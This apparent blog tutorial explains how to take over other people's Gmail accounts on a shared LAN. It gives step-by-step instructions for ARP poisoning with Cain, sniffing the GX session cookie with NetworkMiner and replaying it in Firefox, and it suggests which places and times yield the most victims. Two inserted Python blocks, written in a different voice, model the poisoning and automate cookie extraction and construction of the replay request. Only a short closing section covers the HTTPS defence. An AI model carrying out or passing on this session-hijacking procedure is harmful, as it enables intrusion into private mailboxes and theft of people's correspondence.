
Hacking Gmail account using GX cookie

Introduction:
Hacking web applications has always attracted script kiddies, and hacking a free webmail
account is every geek's first attempt. The method described in this post is not new; the
same approach can be applied to Yahoo and other free webmail services too.
The method we will be using is cookie stealing: capture the victim's session cookie and
replay it back to the Gmail server. There are many ways to steal a cookie; one of them is
XSS (Cross Site Scripting), discussed in an earlier post. But we won't be using XSS here.
In this attack we use local tools to sniff the cookie off the network while it crosses the
wire in plain HTTP, and then use that cookie to get access to the Gmail account.
Assumptions:
* You are on a Local Area Network (LAN), in a switched or wireless environment: for example
an office, a cyber café, or a mall.
* You know basic networking.
Tools used for this attack:
* Cain & Abel
* NetworkMiner
* Firefox web browser with the Cookie Editor add-on
Attack in detail:
We assume you are connected to the LAN or wireless network. Our main goal is to capture
the Gmail GX cookie from the network. We can only capture the cookie while someone is
actually using Gmail, and only if that session runs over plain HTTP. I've noticed that in
the office people normally check their email at lunch time or at the start of a shift. If you
are in a cyber café or in a mall there are more chances of catching people using Gmail.
We will go step by step.
If you are on an open (unencrypted) wireless network you can skip Step A.
A) Using Cain to do ARP poisoning and routing:
A switch forwards a unicast frame only to the port where the destination MAC address
lives. When X and Y are communicating on a switched network, Z never sees their frames, so
in order to sniff that communication you have to poison the ARP caches of X and Y: each
side is made to believe that the other side's IP address belongs to your MAC address, so
their traffic is delivered to you and you forward it on. On an open wireless network you
don't have to do poisoning, because every station hears every frame the access point sends
and an adapter in monitor or promiscuous mode can capture them all (recipients included).
Note that this shortcut only applies to unencrypted Wi-Fi; on a WPA/WPA2 network each
client's traffic is encrypted with its own key, so Step A is needed there as well.
* Start Cain from Start > Programs > Cain > Cain.
* Click the Start/Stop Sniffer icon on the toolbar. We will first scan the network to
see which IPs are in use; this list will also help us pick the victim.
* Click the Sniffer tab, then the Hosts tab below it. Right-click inside that spreadsheet,
click Scan MAC Addresses, in the Target section select
All hosts in my subnet, and press OK. This lists all hosts connected to your
network. You will notice that your own machine's IP address does not appear in the list.
How to check your own IP address?
> Click Start > Run, type cmd and press Enter. In the command prompt type
ipconfig and press Enter. This shows the IP address assigned to your PC.
It will have output like the following:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
The main things to know here are your IP address and your default gateway.
Make a note of your IP address and default gateway. From the host list in Cain, choose a
free IP address that is not used anywhere; Cain will present this spoofed address to the
network instead of your own. We assume 192.168.1.10 is not used anywhere in the network.
* Click Configure > APR > Use Spoofed IP and MAC Address > IP.
Type in 192.168.1.10, and in the poisoning section select 'Use ARP request
Packets', then click OK.
* Within the Sniffer tab, click the APR tab at the bottom and then click APR on the left
hand side. Click in the top right spreadsheet, then click the plus sign on the toolbar.
The moment you click it, a list of IP addresses appears on the left hand side. Here we
target the victim IP address and the default gateway.
The purpose is to poison the ARP caches of the victim and the default gateway so that the
victim's traffic is routed via your machine. From the left side click the victim IP address;
we assume the victim is using 192.168.1.15. The moment you click the victim IP you will see
the remaining list on the right hand side; here select the default gateway IP address,
i.e. 192.168.1.1, then click OK.
* Finally, click the Start/Stop Sniffer toolbar button once again and then click Start/Stop
APR. This starts poisoning the victim and the default gateway.
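What Step A does to the two hosts, as an added example that is not part of the original post and not Cain's code: a small Python model of the victim's and gateway's ARP caches before and after poisoning, together with the check a defender runs over observed ARP traffic to spot it. The IPs follow the walkthrough (victim .15, gateway .1, spoofed attacker address .10); the MAC addresses, the off-link server address and the "learned while trusted" detection baseline are constructed assumptions. The model sends forged replies; Cain's 'Use ARP request Packets' option achieves the same cache overwrite with forged requests.

```python
"""Model of ARP cache poisoning between a victim and its default gateway.

Added example, not code from the original post or from Cain & Abel. The
addresses below are constructed to match the walkthrough (victim .15,
gateway .1, spoofed attacker address .10); the MAC addresses and the
external 203.0.113.10 server (TEST-NET-3) are made up for the demonstration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

VICTIM_IP, GATEWAY_IP, ATTACKER_IP = "192.168.1.15", "192.168.1.1", "192.168.1.10"
VICTIM_MAC = "00:11:22:33:44:15"      # constructed
GATEWAY_MAC = "00:11:22:33:44:01"     # constructed
ATTACKER_MAC = "de:ad:be:ef:00:10"    # constructed
SUBNET_PREFIX = "192.168.1."          # the /24 from the ipconfig output above
GMAIL_SERVER = "203.0.113.10"         # constructed off-link address


@dataclass
class ArpReply:
    """The fields of an ARP reply that matter here: 'sender_ip is at sender_mac'."""
    sender_ip: str
    sender_mac: str
    target_ip: str


@dataclass
class Host:
    ip: str
    mac: str
    arp_cache: Dict[str, str] = field(default_factory=dict)

    def receive(self, reply: ArpReply) -> None:
        # Classic, unprotected stacks accept unsolicited replies addressed to them and
        # overwrite the existing binding. That is the weakness APR relies on.
        if reply.target_ip == self.ip:
            self.arp_cache[reply.sender_ip] = reply.sender_mac

    def next_hop_mac(self, dst_ip: str) -> str:
        """Layer-2 destination for a packet to dst_ip: on-link hosts directly, all else via the gateway."""
        key = dst_ip if dst_ip.startswith(SUBNET_PREFIX) else GATEWAY_IP
        return self.arp_cache[key]


def fresh_hosts() -> Tuple[Host, Host]:
    """Victim and gateway after a normal, honest ARP exchange."""
    victim = Host(VICTIM_IP, VICTIM_MAC, {GATEWAY_IP: GATEWAY_MAC})
    gateway = Host(GATEWAY_IP, GATEWAY_MAC, {VICTIM_IP: VICTIM_MAC})
    return victim, gateway


def poison_replies() -> List[ArpReply]:
    """The two forged replies the attacker keeps sending: one per side, both pointing at the attacker MAC."""
    return [
        ArpReply(sender_ip=GATEWAY_IP, sender_mac=ATTACKER_MAC, target_ip=VICTIM_IP),
        ArpReply(sender_ip=VICTIM_IP, sender_mac=ATTACKER_MAC, target_ip=GATEWAY_IP),
    ]


def run_poisoning() -> Dict[str, str]:
    """Return which MAC the victim's Gmail traffic goes to before and after poisoning."""
    victim, gateway = fresh_hosts()
    before = victim.next_hop_mac(GMAIL_SERVER)
    for reply in poison_replies():
        victim.receive(reply)
        gateway.receive(reply)
    after = victim.next_hop_mac(GMAIL_SERVER)
    # The return path from the gateway to the victim is diverted as well.
    return_path = gateway.next_hop_mac(VICTIM_IP)
    return {"before": before, "after": after, "return_path": return_path}


def detect_spoofing(observed: List[ArpReply], baseline: Dict[str, str]) -> List[str]:
    """Defender's check: an IP whose MAC contradicts the known binding, or one MAC claiming several IPs.

    'baseline' is the IP -> MAC table learned while the network was trusted (an assumption
    of this example; arpwatch-style tools build the same kind of table).
    """
    alerts: List[str] = []
    claimed: Dict[str, set] = {}
    for r in observed:
        known = baseline.get(r.sender_ip)
        if known is not None and known != r.sender_mac:
            alerts.append(f"{r.sender_ip} moved from {known} to {r.sender_mac}")
        claimed.setdefault(r.sender_mac, set()).add(r.sender_ip)
    for mac, ips in claimed.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    print(run_poisoning())
    trusted = {GATEWAY_IP: GATEWAY_MAC, VICTIM_IP: VICTIM_MAC}
    for alert in detect_spoofing(poison_replies(), trusted):
        print("ALERT:", alert)
```

Before poisoning the victim's frames for mail.google.com leave for the gateway MAC; after the two forged replies they leave for the attacker MAC, and so do the gateway's frames back to the victim, which is why the attacker sits in the middle of both directions. The detector raises three alerts on the same two frames: both IPs changed MAC, and one MAC now claims two IPs.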
B) Using NetworkMiner to capture the cookie in plain text
We are using NetworkMiner to capture the cookie, but NetworkMiner can be used for many
things: capturing text, images, HTTP parameters and files. NetworkMiner is normally used in
passive reconnaissance to collect IP, domain and OS fingerprint information about the
devices talking to your machine. If you don't have NetworkMiner you can use any other
sniffer, such as Wireshark, Iris, NetWitness, etc.
We are using this tool because of its ease of use.
* Open NetworkMiner by clicking its exe (please note it requires the .NET Framework to work).
* From the '---Select network adapter in the list---' drop-down, click the down arrow and
select your adapter. If you are using a wired Ethernet network, the adapter name will
contain "Ethernet" and the IP address of your machine; if you are using wireless, the
adapter name will contain "wireless" and your IP address. Select the one you are
using and click Start.
Important: before you start, make sure you are not browsing any websites or using any
instant messaging, and that you have cleared all cookies from Firefox, so that your own
cookies do not end up in the capture and get confused with the victim's.
* Click the Credentials tab. This tab captures all HTTP cookies; look closely at the
'Host' column, where you should see mail.google.com. If you find a mail.google.com entry,
right-click its Username column and click 'Copy username', then open Notepad and paste
the copied content there.
* Turn off Word Wrap in Notepad and search the line for GX. The captured Cookie header
contains many Gmail cookies, each separated by a semicolon. The GX cookie starts with
GX= and ends at the next semicolon; copy everything between the = and the semicolon.
Example: GX=axcvb1mzdwkfefv ; -> copy only axcvb1mzdwkfefv
Now that we have captured the GX cookie, it is time to use it: replay it to the Gmail server
and log in to the victim's email account. For this we will use Firefox and the Cookie Editor add-on.
C) Using Firefox & Cookie Editor to replay the attack
* Open Firefox and log in to your own Gmail account.
* In Firefox click Tools > Cookie Editor.
* In the filter box type .google.com and press Filter; in the list below, search for the
cookie named GX. Double-click the GX cookie, delete everything in the Content box,
paste the GX value captured in step B, click Save and then Close.
* In the Firefox address bar type mail.google.com and press Enter. This replays the
victim's GX cookie to the Gmail server, and you are logged in to the victim's Gmail
account.
* Sorry! You can't change the password with a cookie attack.
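The manual parts of steps B and C done in code, as an added example that is not from the original post, NetworkMiner or the Cookie Editor add-on: parse sniffed HTTP requests, pick the GX value out of the Cookie header of the one addressed to mail.google.com, and build the request a browser sends once that value has been swapped into its own cookie jar. The two captured requests and every cookie value are constructed; only the GX placeholder from the walkthrough is reused. It also shows why the Notepad text search is fragile: the same two letters can appear inside another cookie's value, so the header has to be split by cookie name.

```python
"""Steps B and C in code: extract the GX cookie from sniffed HTTP and build the replay request.

Added example, not code from the original post, NetworkMiner or the Cookie Editor add-on.
The captured requests below are constructed; the cookie names are placeholders shaped like
the ones Gmail set at the time and the GX value is the made-up one from the walkthrough.
Only plain-HTTP traffic can be read this way; with HTTPS the sniffer sees ciphertext.
"""
from typing import Dict, List, Optional, Tuple

# Constructed sample of what a plaintext sniffer hands you: an unrelated request and a Gmail one.
CAPTURED_REQUESTS: List[bytes] = [
    b"GET /search?q=lunch HTTP/1.1\r\n"
    b"Host: www.google.com\r\n"
    b"Cookie: PREF=ID=0123456789abcdef:TM=1; NID=42=sGXyz\r\n\r\n",
    b"GET /mail/?ui=2&view=tl HTTP/1.1\r\n"
    b"Host: mail.google.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows)\r\n"
    b"Cookie: S=gmail=fghij; GMAIL_AT=xn3abc; GX=axcvb1mzdwkfefv; SID=DQAAAHc\r\n\r\n",
]


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Split a Cookie request header into name -> value.

    Splitting on ';' and then on the *first* '=' matters: cookie values may contain '='
    themselves. A plain text search for 'GX' would also hit 'sGXyz' inside the NID cookie above.
    """
    cookies: Dict[str, str] = {}
    for pair in value.split(";"):
        pair = pair.strip()
        if "=" not in pair:
            continue
        name, _, val = pair.partition("=")
        cookies[name.strip()] = val.strip()
    return cookies


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str], Dict[str, str]]:
    """Return (path, headers, cookies) for one raw HTTP/1.x request; header names are lower-cased."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    _method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers, parse_cookie_header(headers.get("cookie", ""))


def find_gx(requests: List[bytes], host: str = "mail.google.com") -> Optional[str]:
    """The Notepad step: the GX value from the first request to `host` that carries one, else None."""
    for raw in requests:
        _path, headers, cookies = parse_request(raw)
        if headers.get("host", "").lower() == host and "GX" in cookies:
            return cookies["GX"]
    return None


def build_replay(host: str, path: str, cookies: Dict[str, str]) -> bytes:
    """The request Firefox sends after the Cookie Editor edit: our jar with the victim's GX swapped in."""
    cookie_header = "; ".join(f"{name}={value}" for name, value in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_header}\r\n"
        f"Connection: close\r\n\r\n"
    ).encode("iso-8859-1")


def replay_for(requests: List[bytes], own_cookies: Dict[str, str]) -> Optional[bytes]:
    """Swap the sniffed GX into our own cookie jar and produce the replay request, or None if none was captured."""
    gx = find_gx(requests)
    if gx is None:
        return None
    jar = dict(own_cookies)
    jar["GX"] = gx
    return build_replay("mail.google.com", "/mail/", jar)


if __name__ == "__main__":
    print("captured GX:", find_gx(CAPTURED_REQUESTS))
    replay = replay_for(CAPTURED_REQUESTS, {"GX": "ourownvalue", "PREF": "ID=1"})
    print(replay.decode("iso-8859-1") if replay else "nothing captured")
```

Run stand-alone it prints the captured value and the replay request; the first constructed request is correctly ignored even though its NID value contains the letters GX.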
How to be saved from this kind of attack?
Google provides a way out: you can make Gmail use a secure (HTTPS-only) cookie instead of
an unsecure one by enabling the option to always use HTTPS in Gmail settings:
Settings > Browser connection > Always use https
With this set, the whole Gmail session runs over TLS, so the session cookie never crosses the
network in cleartext and a sniffer on the LAN sees only encrypted traffic. Note that this
protects only Gmail; any other site you use over plain HTTP on that network is still exposed
to exactly the same cookie capture.
